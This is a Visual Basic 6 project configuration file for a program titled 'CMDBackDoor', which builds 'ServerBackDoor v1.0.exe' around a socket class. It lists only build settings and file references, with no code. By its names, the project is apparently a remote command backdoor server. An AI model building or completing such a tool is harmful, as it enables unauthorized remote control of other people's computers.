Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE Automation
Form=ServerFRM.frm
Class=CSocketMaster; CSocketMaster.cls
Module=modSocketMaster; modSocketMaster.bas
IconForm="ServerFRM"
Startup="ServerFRM"
HelpFile=""
Title="CMDBackDoor"
ExeName32="ServerBackDoor v1.0.exe"
Path32="Build Exe"
Command32=""
Name="CMDBackDoorServer"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionComments="CMDBackDoor "
VersionCompanyName="One Computer Software"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0
